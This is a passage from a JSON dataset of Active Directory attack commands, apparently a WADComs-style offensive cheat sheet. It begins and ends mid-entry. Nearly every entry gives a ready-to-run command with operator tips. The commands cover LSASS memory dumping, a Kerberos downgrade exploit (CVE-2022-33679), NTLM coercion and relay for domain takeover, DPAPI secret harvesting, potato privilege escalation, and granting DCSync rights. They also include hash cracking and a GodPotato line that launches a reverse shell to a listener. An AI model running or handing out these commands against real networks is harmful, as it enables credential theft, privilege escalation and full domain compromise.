john -p password123 -d test.local -t 10.10.10.1","description":"Coercer's 'scan' mode enumerates which RPC coercion methods and named pipes are reachable on a target without actually completing an authentication relay, letting an operator map the exposed attack surface (MS-RPRN, MS-EFSR, MS-DFSNM, MS-FSRVP, etc.) before choosing a vector. Use it as reconnaissance to confirm a host is vulnerable and to pick the quietest single method rather than blasting all of them with coerce. Typically run with a valid domain account.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/p0dalirius/Coercer","https://podalirius.net/en/articles/coercer-an-automatic-authentication-coercion-tool/"],"added":true},{"id":"wadcoms:Comsvcs-MiniDump-LSASS","toolId":"wadcoms:Comsvcs","toolName":"Comsvcs","name":"Comsvcs-MiniDump-LSASS","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Get the LSASS PID first: tasklist /fi \"imagename eq lsass.exe\"\nrundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump <lsass_pid> C:\\Windows\\Temp\\lsass.dmp full","description":"The built-in comsvcs.dll exports a MiniDump function that rundll32 can call to write a full memory dump of any process by PID, making it a living-off-the-land LSASS dumper that needs no dropped tooling. Supply the LSASS PID (find it with tasklist or Get-Process lsass), an output path, and the 'full' flag for a complete dump. It requires SYSTEM (or admin + SeDebugPrivilege); the dump is then parsed offline with pypykatz or Mimikatz. This technique is well-signatured, so treat it as noisy.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp\n\n\tLSASS PID: <lsass_pid>","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://lolbas-project.github.io/lolbas/Libraries/comsvcs/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true},{"id":"wadcoms:CVE-2022-33679-Downgrade","toolId":"wadcoms:CVE","toolName":"CVE","name":"CVE-2022-33679 Kerberos RC4-MD4 Downgrade","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Execution"],"nativeCategory":["Credential Access","Exploitation"],"command":"# target = domain/username (AS-REP-roastable account), serverName = DC FQDN\npython3 CVE-2022-33679.py test.local/john dc.test.local -dc-ip 10.10.10.1\n\n# Use the recovered ticket\nexport KRB5CCNAME=john_dc.ccache","description":"CVE-2022-33679 is an unauthenticated Kerberos encryption-downgrade attack: the KDC returns AS-REP material encrypted with the legacy RC4-MD4 (etype 24) cipher for an account, and a known-plaintext weakness lets the attacker brute-force the ephemeral session key and forge a usable TGT. Bdenneu's standalone exploit targets a domain account that has 'Do not require Kerberos pre-authentication' set and an RC4 key, needing only the victim's username (no password). It writes the recovered TGT to a ccache named <user>_<server>.ccache, which can then be used for unauthenticated Kerberoasting or further access.\n\nCommand Reference:\n\n\tTarget (domain/user): test.local/john\n\n\tDC host: dc.test.local\n\n\tDC IP: 10.10.10.1\n\n\tOutput: out.ccache","mitre":[],"requires":["No_Creds"],"services":["Kerberos"],"references":["https://github.com/Bdenneu/CVE-2022-33679","https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html","https://horizon3.ai/attack-research/attack-blogs/from-cve-2022-33679-to-unauthenticated-kerberoasting/"],"added":true},{"id":"wadcoms:DFSCoerce","toolId":"wadcoms:DFSCoerce","toolName":"DFSCoerce","name":"DFSCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 dfscoerce.py -u john -p password123 -d test.local 10.10.10.2 10.10.10.1","description":"DFSCoerce abuses the MS-DFSNM (Distributed File System Namespace Management) RPC interface exposed on a Domain Controller (via the \\PIPE\\netdfs named pipe) to coerce the DC machine account into authenticating to an attacker-controlled host. Because the vulnerable interface lives on the DC itself, it is a reliable path to relay the DC$ authentication to ADCS or LDAP for a domain takeover. The listener is passed first, the target DC second, mirroring PetitPotam's argument order. A valid low-privileged domain account is normally required.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/Wh04m1001/DFSCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-dfsnm"],"added":true},{"id":"wadcoms:DonPAPI-Collect","toolId":"wadcoms:DonPAPI","toolName":"DonPAPI","name":"DonPAPI-Collect","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"# Mass DPAPI harvest against a host (or CIDR / target file), fetching the domain backup key\ndonpapi collect -u john -p password123 -d test.local -t 10.10.10.1 --fetch-pvk\n\n# Browse the collected loot afterward\ndonpapi gui","description":"DonPAPI (login-securite) mass-harvests DPAPI-protected secrets across a set of Windows hosts from Linux without dropping a binary: it remotely reads and decrypts credential blobs, saved browser passwords and cookies, Wi-Fi keys, scheduled task and vault credentials, and certificates. The collect subcommand takes standard NetExec-style auth (-u/-p, -H for hashes, -k/--aesKey for Kerberos) and a -t target list; --fetch-pvk grabs the domain backup key so user masterkeys decrypt automatically. Results land in a local database browsable afterward with donpapi gui. Requires local admin on each target and is loud at scale, so scope the target list carefully.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/login-securite/DonPAPI","https://www.login-securite.com/2022/03/28/donpapi/"],"added":true},{"id":"wadcoms:EfsPotato-SeImpersonate","toolId":"wadcoms:EfsPotato","toolName":"EfsPotato","name":"EfsPotato-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Compile on the target with the bundled .NET compiler\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /nowarn:1691,618 /out:EfsPotato.exe EfsPotato.cs\n\n# Run a command as SYSTEM (optional 2nd arg picks the named pipe)\nEfsPotato.exe \"whoami\"\nEfsPotato.exe \"whoami\" 2","description":"EfsPotato abuses the MS-EFSRPC (Encrypting File System Remote) interface to coerce the local SYSTEM account to authenticate over a named pipe, then impersonates the token to run a command as SYSTEM. It is a single self-contained source file typically compiled on the target with csc.exe, which helps evade AV signatures on prebuilt potato binaries. The optional second argument selects the named pipe (1=lsarpc, 2=efsrpc, 3=samr, 4=lsass, 5=netlogon) to dodge partial MS-EFSRPC patches. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tPipe selector (optional): 2 = \\pipe\\efsrpc","mitre":[],"requires":["Shell"],"services":["RPC"],"references":["https://github.com/zcgonvh/EfsPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true},{"id":"wadcoms:GodPotato-SeImpersonate","toolId":"wadcoms:GodPotato","toolName":"GodPotato","name":"GodPotato-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Run a command as NT AUTHORITY\\SYSTEM\nGodPotato-NET4.exe -cmd \"cmd /c whoami\"\n\n# Example: trigger a reverse shell payload as SYSTEM\nGodPotato-NET4.exe -cmd \"cmd /c C:\\Windows\\Temp\\rev.exe 10.10.10.2 443\"","description":"GodPotato abuses SeImpersonatePrivilege to escalate a service account to SYSTEM by triggering a SYSTEM RPC/DCOM authentication against a local fake OXID resolver, then impersonating the returned token. Unlike the older *Potato variants it works broadly across Windows Server 2012 R2 through 2022 and Windows 8 through 11. Pick the binary matching the installed .NET runtime (GodPotato-NET2/NET35/NET4). Requires SeImpersonatePrivilege or SeAssignPrimaryToken on the current token.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege","mitre":["T1134.002"],"requires":["Shell"],"services":["DCOM","RPC"],"references":["https://github.com/BeichenDream/GodPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato","https://attack.mitre.org/techniques/T1134/002/"],"added":true},{"id":"wadcoms:Hashcat-ASREPRoast","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-ASREPRoast","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one $krb5asrep$23$user@TEST.LOCAL:... blob per account\nhashcat -m 18200 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 18200 hashes.txt --show","description":"Accounts with 'Do not require Kerberos preauthentication' set will return an AS-REP whose encrypted part is derived from the account password. Hashcat mode 18200 cracks the RC4-HMAC (etype 23) $krb5asrep$23$ format produced by Impacket GetNPUsers.py or Rubeus asreproast. No valid domain credentials are needed to collect these, and cracking is fully offline against a wordlist.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1558.004"],"requires":["Hash"],"services":["Kerberos"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://attack.mitre.org/techniques/T1558/004/"],"added":true},{"id":"wadcoms:Hashcat-DCC2-mscash2","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-DCC2-mscash2","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one $DCC2$10240#john#<hash> line per cached account\nhashcat -m 2100 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 2100 hashes.txt --show","description":"Domain Cached Credentials v2 (mscash2 / DCC2) are the cached logon verifiers stored on domain-joined hosts so users can log in when the DC is unreachable, recoverable with secretsdump.py or mimikatz. Hashcat mode 2100 cracks the $DCC2$iterations#username#hash format. DCC2 uses PBKDF2 (default 10240 iterations) and cannot be passed or relayed, so offline cracking is the only path to the password; expect it to be far slower than NTLM.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1003.005"],"requires":["Hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/005/"],"added":true},{"id":"wadcoms:Hashcat-Kerberoast-TGSREP","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-Kerberoast-TGSREP","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one $krb5tgs$23$*...*$... blob per SPN\nhashcat -m 13100 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\n# recover already-cracked results from the potfile\nhashcat -m 13100 hashes.txt --show","description":"Kerberoasting returns a TGS-REP whose encrypted portion is derived from the service account's password. Hashcat mode 13100 targets the RC4-HMAC (etype 23) $krb5tgs$23$ format produced by Impacket GetUserSPNs.py or Rubeus. Because the ticket is keyed to the account password, it can be recovered fully offline with a wordlist, no further contact with the DC and no lockout risk. This is the standard follow-up to any Kerberoast collection.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1558.003"],"requires":["Hash"],"services":["Kerberos"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/kerberos/kerberoast","https://attack.mitre.org/techniques/T1558/003/"],"added":true},{"id":"wadcoms:Hashcat-NetNTLMv1","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-NetNTLMv1","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# straight dictionary crack of the NetNTLMv1 response\nhashcat -m 5500 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\n# preferred: reverse a fixed-challenge (1122334455667788) response to the NT hash\n# format it with evilmog's ntlmv1-multi, then submit to crack.sh / crack DES locally\npython3 ntlmv1.py --ntlmv1 'john::TEST:...:...:1122334455667788'","description":"Legacy NetNTLMv1 responses (user::domain:LMresp:NTresp:challenge) are cracked with hashcat mode 5500. Their real value is that a NetNTLMv1 response captured against a known/forced challenge (e.g. 1122334455667788) is a DES computation over the raw NT hash, so it can be reversed to the account's NT hash rather than a password. The evilmog ntlmv1-multi tool formats the response for submission to crack.sh, which historically returned the NT hash instantly via DES rainbow tables (the public service has since been offline; the same reversal can be run locally as hashcat mode 14000 DES). The recovered NT hash then enables pass-the-hash.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":[],"requires":["Hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://github.com/evilmog/ntlmv1-multi","https://crack.sh/netntlm/"],"added":true},{"id":"wadcoms:Hashcat-NetNTLMv2","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-NetNTLMv2","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one JOHN::TEST:112233...:HMAC:blob line per capture\nhashcat -m 5600 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 5600 hashes.txt --show","description":"Responder, ntlmrelayx or an SMB/HTTP poisoning capture yields NetNTLMv2 challenge-response hashes in the form user::domain:challenge:HMAC:blob. Hashcat mode 5600 cracks these offline to recover the account's cleartext password. NetNTLMv2 cannot be passed-the-hash, so cracking (or relaying) is the only way to weaponise a captured response.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1110.002"],"requires":["Hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/ntlm/capture","https://attack.mitre.org/techniques/T1110/002/"],"added":true},{"id":"wadcoms:Hashcat-NTLM-secretsdump","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-NTLM-secretsdump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# feed the full secretsdump pwdump line and let hashcat strip the user field\nhashcat -m 1000 -a 0 --username hashes.txt /usr/share/wordlists/rockyou.txt\n\n# or crack a bare NT hash\nhashcat -m 1000 -a 0 2a3de7fe356ee524cc9f3d579f2e0aa7 /usr/share/wordlists/rockyou.txt\n\nhashcat -m 1000 --username hashes.txt --show","description":"Impacket secretsdump.py, an NTDS.dit dump or a SAM dump yields lines of the form user:rid:lmhash:nthash:::. Hashcat mode 1000 cracks the raw NT hash to cleartext. The --username flag lets hashcat parse the full pwdump-style line and keep the account association in the output. Cracking is optional for lateral movement (NT hashes can be passed) but is needed to recover reusable passwords and to spot password reuse.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tNT Hash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1003.002"],"requires":["Hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://github.com/fortra/impacket/blob/master/examples/secretsdump.py","https://attack.mitre.org/techniques/T1003/002/"],"added":true},{"id":"wadcoms:Impacket-dacledit-DCSync","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-dacledit-DCSync","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Persistence","Credential Access"],"nativeCategory":["PrivEsc","Persistence","Credential Access"],"command":"# Grant john DCSync rights on the domain object\ndacledit.py -action 'write' -rights 'DCSync' -principal 'john' -target-dn 'DC=test,DC=local' -dc-ip 10.10.10.1 'test.local/john:password123'","description":"Impacket's dacledit.py reads and modifies the DACL of an Active Directory object over LDAP. With `-action write -rights DCSync` against the domain naming context it grants a principal the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, enabling that principal to perform a DCSync and dump every domain hash. This is a classic ACL-based domain-privilege-escalation and persistence primitive; it requires WriteDacl over the domain object. Back up the DACL with `-action read` first so you can restore it.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tGranted principal: john","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:Impacket-DescribeTicket","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-DescribeTicket","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"# Describe a ticket offline (envelope, flags, and the PAC where it can be read)\ndescribeTicket.py out.ccache","description":"Impacket describeTicket.py parses a Kerberos ticket file (ccache or kirbi) and prints its fields, and when given the relevant key it decrypts the enc-part and dumps the PAC, exposing the user, RID, group memberships and PAC signatures. It is the Linux counterpart to Rubeus describe and is useful for validating forged or captured tickets before use. Runs fully offline.\n\nCommand Reference:\n\n\tTicket file: out.ccache","mitre":[],"requires":["TGT"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:Impacket-FindDelegation","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-FindDelegation","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Enumerate all delegation relationships in the domain\nfindDelegation.py test.local/john:password123 -dc-ip 10.10.10.1","description":"Impacket findDelegation.py enumerates every delegation relationship in the domain over LDAP: unconstrained, constrained (S4U2Proxy allowed-to-delegate-to targets) and resource-based constrained delegation. The output identifies accounts and computers that can be abused for privilege escalation and lateral movement via Kerberos delegation. Requires any valid domain credentials.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["Kerberos","LDAP"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/kerberos/delegations","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/constrained-delegation"],"added":true},{"id":"wadcoms:Impacket-GetUserSPNs-NoPreauth","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-GetUserSPNs-NoPreauth","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery","Credential Access"],"nativeCategory":["Enumeration","Credential Access"],"command":"# 'john' is an account with Kerberos pre-auth disabled; usernames.txt lists SPN accounts to roast\nGetUserSPNs.py -no-preauth john -usersfile usernames.txt -dc-host dc.test.local test.local/","description":"GetUserSPNs.py with -no-preauth performs Kerberoasting without any valid domain credentials. It leverages an account that has Kerberos pre-authentication disabled (an AS-REP roastable account): by altering the sname in a crafted KRB_AS_REQ, the KDC returns a service ticket instead of a TGT, encrypted with the target service account's key. Because you cannot query LDAP for SPNs without creds, you must supply candidate service-account names with -usersfile. The resulting TGS hashes are cracked offline. You only need the name of one pre-auth-disabled account plus a list of accounts to roast.\n\nCommand Reference:\n\n\tNo_Creds (name of an AS-REP roastable account: john)\n\tCandidate accounts file: usernames.txt\n\tDomain: test.local\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["No_Creds"],"services":["Kerberos","LDAP"],"references":["https://github.com/fortra/impacket","https://swarm.ptsecurity.com/kerberoasting-without-spns/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"],"added":true},{"id":"wadcoms:Impacket-GoldenPac","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-GoldenPac","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Lateral Movement"],"nativeCategory":["PrivEsc","Exploitation","Lateral Movement"],"command":"# Exploit MS14-068 to gain SYSTEM on an unpatched DC\ngoldenPac.py test.local/john:password123@dc.test.local","description":"Impacket goldenPac.py exploits MS14-068 (CVE-2014-6324): on an unpatched domain controller the PAC signature validation can be bypassed, letting an ordinary domain user forge a TGT claiming Domain Admin membership without the krbtgt key. The script builds the forged PAC, obtains a privileged ticket and then executes a command (PSEXEC-style) on the target DC. Only affects DCs missing the 2014 patch, but remains relevant against legacy lab and CTF environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller host: dc.test.local","mitre":["T1558"],"requires":["Username","Password"],"services":["Kerberos","SMB"],"references":["https://github.com/fortra/impacket","https://github.com/fortra/impacket/blob/master/examples/goldenPac.py","https://attack.mitre.org/techniques/T1558/"],"added":true},{"id":"wadcoms:Impacket-MSSQLClient","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-MSSQLClient","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Lateral Movement","Discovery"],"nativeCategory":["Lateral Movement","Enumeration"],"command":"# SQL authentication (mixed-mode / sa account)\nmssqlclient.py test.local/john:password123@10.10.10.1\n\n# Windows (domain) authentication over NTLM\nmssqlclient.py test.local/john:password123@10.10.10.1 -windows-auth\n\n# Pass-the-hash with Windows auth\nmssqlclient.py -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 test.local/john@10.10.10.1 -windows-auth","description":"mssqlclient.py from Impacket opens an interactive TDS session against a Microsoft SQL Server. It supports plain SQL logins (the local sa or a mixed-mode account) as well as Windows/domain authentication via -windows-auth, which forces NTLM instead of SQL auth. Pass-the-hash works by supplying -hashes LMHASH:NTHASH instead of a password. Use it as the entry point for all further MSSQL abuse (enumeration, xp_cmdshell, linked servers).\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.thehacker.recipes/ad/movement/mssql"],"added":true},{"id":"wadcoms:Impacket-MSSQLClient-XPCmdShell","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-MSSQLClient-XPCmdShell","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"mssqlclient.py test.local/john:password123@10.10.10.1 -windows-auth\n\n# At the SQL> prompt:\nSQL> enable_xp_cmdshell\nSQL> xp_cmdshell whoami\nSQL> disable_xp_cmdshell","description":"Once connected with mssqlclient.py, the built-in enable_xp_cmdshell command flips the xp_cmdshell advanced option on (via sp_configure), and xp_cmdshell then runs arbitrary OS commands as the SQL Server service account. This requires sysadmin (or equivalent) on the instance. Disable it again with disable_xp_cmdshell to reduce footprint; enabling xp_cmdshell is noisy and commonly alerted on.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.thehacker.recipes/ad/movement/mssql/execution"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-AddComputer","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-NTLMRelayX-AddComputer","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"# Create a new computer account via the relayed session\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --add-computer 'ATTACKER$' 'password123'","description":"Impacket's ntlmrelayx.py relays authentication to LDAPS and, with --add-computer, creates a new attacker-controlled computer account in the directory. This abuses the default MachineAccountQuota of 10, which permits any authenticated domain user to add computer objects. The freshly created account (with a known password) becomes a foothold for follow-on RBCD or Shadow Credentials attacks. If a computername and password are omitted, ntlmrelayx generates a random machine name and password and prints them. LDAPS is required because adding a computer with a password sets attributes that the DC only permits over a signed/sealed channel.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tNew computer account: ATTACKER$\n\n\tPassword: password123","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-DumpLAPS-ADCS","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-NTLMRelayX-DumpLAPS-ADCS","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery","Credential Access"],"nativeCategory":["Discovery","Credential Access","Enumeration"],"command":"# Dump LAPS passwords and enumerate AD CS via the relayed LDAP session\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --dump-laps --dump-adcs","description":"Impacket's ntlmrelayx.py can leverage a relayed LDAP session for reconnaissance instead of a direct attack. --dump-laps reads and prints any LAPS-managed local administrator passwords (ms-Mcs-AdmPwd) that the relayed identity is permitted to read, and --dump-adcs enumerates AD CS enrollment services and certificate templates to help identify ESC1-ESC8 misconfigurations. Both are low-noise post-relay actions useful for expanding access after coercing a user or computer to authenticate. The amount of data returned depends entirely on the relayed principal's read permissions.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP","ADCS"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://www.thehacker.recipes/ad/movement/credentials/dumping/laps"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-ESC8-ADCS","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-NTLMRelayX-ESC8-ADCS","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Privilege Escalation","Credential Access","Execution"],"nativeCategory":["PrivEsc","Credential Access","Exploitation"],"command":"# Relay coerced DC auth to AD CS web enrollment (ESC8)\npython3 ntlmrelayx.py -t http://ca.test.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController","description":"Impacket's ntlmrelayx.py relays coerced NTLM authentication to the Active Directory Certificate Services (AD CS) web enrollment endpoint (certsrv), abusing ESC8. HTTP enrollment interfaces do not enforce channel binding by default, so a relayed machine or user authentication can request a certificate on behalf of the coerced account. When a Domain Controller's machine account is coerced (via PetitPotam or the printer bug) and relayed against the DomainController template, the resulting certificate authenticates as the DC and enables full domain compromise. The --adcs flag enables the attack and --template selects the certificate template (Machine/DomainController for computers, User for users). ntlmrelayx prints the issued certificate as a base64 PFX for use with PKINIT.\n\nCommand Reference:\n\n\tAD CS enrollment endpoint: http://ca.test.local/certsrv/certfnsh.asp\n\n\tTemplate: DomainController","mitre":[],"requires":["No_Creds"],"services":["NTLM","ADCS"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/relay"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-EscalateUser","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-NTLMRelayX-EscalateUser","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Grant existing user 'john' DCSync rights via relayed privileged auth\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --escalate-user john","description":"Impacket's ntlmrelayx.py relays authentication from a privileged victim to LDAP/LDAPS and, with --escalate-user, grants the named existing user the ability to perform a DCSync by writing replication (Replicating Directory Changes) ACEs onto the domain object. This is used when you already control a low-privileged user account and can coerce a privileged principal (for example a Domain Admin session or a DC machine account) to authenticate to your relay. Unlike --add-computer, this modifies an existing account you already own rather than creating a new one, which is useful in environments where MachineAccountQuota is 0.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tUser to escalate: john","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-Interactive","toolId":"wadcoms:Impacket","toolName":"Impacket","name":"Impacket-NTLMRelayX-Interactive","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Lateral Movement","Collection","Execution"],"nativeCategory":["Lateral Movement","Collection","Exploitation"],"command":"# Relay to SMB and open an interactive client shell\npython3 ntlmrelayx.py -t smb://10.10.10.1 -smb2support -i\n# In another terminal, connect to the spawned session\nnc 127.0.0.1 11000","description":"Impacket's ntlmrelayx.py can hold a relayed SMB session open and expose it as an interactive client rather than running a single command. With -i (--interactive), each successful relay spawns an interactive SMB shell bound to a local TCP port (starting at 11000); connect to it with netcat to browse shares, upload/download files, 